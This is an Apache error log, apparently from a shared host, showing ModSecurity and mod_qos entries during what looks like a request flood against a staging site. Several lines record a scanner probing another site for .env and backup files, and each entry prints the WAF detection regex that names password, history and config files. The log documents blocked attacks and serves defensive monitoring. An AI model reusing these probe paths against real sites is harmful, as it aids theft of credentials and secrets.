[Tue May 26 19:55:19.362839 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ-QAAAF4"]
[Tue May 26 19:55:19.364134 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaBAAAAGk"]
[Tue May 26 19:55:19.365537 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaCwAAAEI"]
[Tue May 26 19:55:19.371618 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaHAAAAD8"]
[Tue May 26 19:55:19.376972 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TMQAAAc0"]
[Tue May 26 19:55:19.381980 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TOgAAAgg"]
[Tue May 26 19:55:19.394012 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TPAAAAZI"]
[Tue May 26 19:55:19.394108 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ8AAAAEU"]
[Tue May 26 19:55:19.401913 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaGwAAAFk"]
[Tue May 26 19:55:19.414778 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TOQAAAg4"]
[Tue May 26 19:55:19.418359 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TSwAAAco"]
[Tue May 26 19:55:19.424444 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaBwAAAE4"]
[Tue May 26 19:55:19.425349 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaBgAAABQ"]
[Tue May 26 19:55:19.437000 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TMAAAAaI"]
[Tue May 26 19:55:19.444138 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TPQAAAf8"]
[Tue May 26 19:55:19.449586 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaAAAAAEM"]
[Tue May 26 19:55:19.450875 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaFwAAAEw"]
[Tue May 26 19:55:19.454838 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaCAAAAHc"]
[Tue May 26 19:55:19.454884 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TUgAAAeU"]
[Tue May 26 19:55:19.459702 2026] [security2:error] [pid 93576:tid 93735] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.mailgun.backup"] [unique_id "ahWtT2DRMqfxdEDkoszaSwAAABc"]
[Tue May 26 19:55:19.628120 2026] [security2:error] [pid 93576:tid 93777] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database.backup"] [unique_id "ahWtT2DRMqfxdEDkoszaVgAAAEE"]
[Tue May 26 19:55:19.796815 2026] [security2:error] [pid 93576:tid 93756] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.backup.old"] [unique_id "ahWtT2DRMqfxdEDkoszaZgAAACw"]
[Tue May 26 19:55:20.133653 2026] [security2:error] [pid 93868:tid 94342] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T4gAAAeM"]
[Tue May 26 19:55:20.137128 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtUEqK9k_ZUB2Vp25UBAAAAbk
[Tue May 26 19:55:20.137664 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtUGDRMqfxdEDkoszahwAAABM
[Tue May 26 19:55:20.138366 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtUGDRMqfxdEDkoszaiAAAACA
[Tue May 26 19:55:20.144268 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtUGDRMqfxdEDkoszaiwAAAAo
[Tue May 26 19:55:20.287095 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaHgAAAAg"]
[Tue May 26 19:55:20.296530 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaBQAAADw"]
[Tue May 26 19:55:20.297644 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TXAAAAZo"]
[Tue May 26 19:55:20.299198 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaIAAAAFU"]
[Tue May 26 19:55:20.305254 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TUAAAAaA"]
[Tue May 26 19:55:20.309305 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TOwAAAak"]
[Tue May 26 19:55:20.314075 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TVgAAAfk"]
[Tue May 26 19:55:20.330008 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TVAAAAek"]
[Tue May 26 19:55:20.338411 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TTwAAAcU"]
[Tue May 26 19:55:20.339188 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TYAAAAgA"]
[Tue May 26 19:55:20.341776 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TXwAAAgI"]
[Tue May 26 19:55:20.342805 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TQAAAAfI"]
[Tue May 26 19:55:20.343138 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TYQAAAeQ"]
[Tue May 26 19:55:20.343876 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TeAAAAZs"]
[Tue May 26 19:55:20.346543 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TUwAAAdk"]
[Tue May 26 19:55:20.353240 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TdwAAAgQ"]
[Tue May 26 19:55:20.354546 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszaTwAAAGQ"]
[Tue May 26 19:55:20.367560 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TZAAAAbg"]
[Tue May 26 19:55:20.374100 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25TwAAAAaM"]
[Tue May 26 19:55:20.386398 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaNQAAAHU"]
[Tue May 26 19:55:20.389568 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T0gAAAbU"]
[Tue May 26 19:55:20.389792 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaIwAAAEs"]
[Tue May 26 19:55:20.393771 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25TxQAAAdI"]
[Tue May 26 19:55:20.403603 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25TtgAAAcQ"]
[Tue May 26 19:55:20.419951 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25TzQAAAac"]
[Tue May 26 19:55:20.421069 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25TwwAAAes"]
[Tue May 26 19:55:20.425970 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25TywAAAe4"]
[Tue May 26 19:55:20.449138 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T8wAAAZ0"]
[Tue May 26 19:55:20.452782 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T4AAAAd4"]
[Tue May 26 19:55:20.457244 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T8gAAAbM"]
[Tue May 26 19:55:20.471229 2026] [security2:error] [pid 93576:tid 93776] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/reload/.env"] [unique_id "ahWtUGDRMqfxdEDkoszakAAAAEA"]
[Tue May 26 19:55:20.978186 2026] [security2:error] [pid 93576:tid 93789] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/assets/.env"] [unique_id "ahWtUGDRMqfxdEDkoszamgAAAE0"]
[Tue May 26 19:55:21.274766 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T1AAAAfM"]
[Tue May 26 19:55:21.278195 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszabwAAAHw"]
[Tue May 26 19:55:21.279007 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T0QAAAag"]
[Tue May 26 19:55:21.279711 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25TzgAAAdE"]
[Tue May 26 19:55:21.283437 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T0AAAAc0"]
[Tue May 26 19:55:21.284021 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T1gAAAgg"]
[Tue May 26 19:55:21.284075 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszacwAAAGM"]
[Tue May 26 19:55:21.289569 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszaYQAAAGw"]
[Tue May 26 19:55:21.296393 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszabgAAAC8"]
[Tue May 26 19:55:21.296531 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25T-QAAAcw"]
[Tue May 26 19:55:21.300658 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT2DRMqfxdEDkoszadgAAAAQ"]
[Tue May 26 19:55:21.301755 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtT0qK9k_ZUB2Vp25TxwAAAf0"]
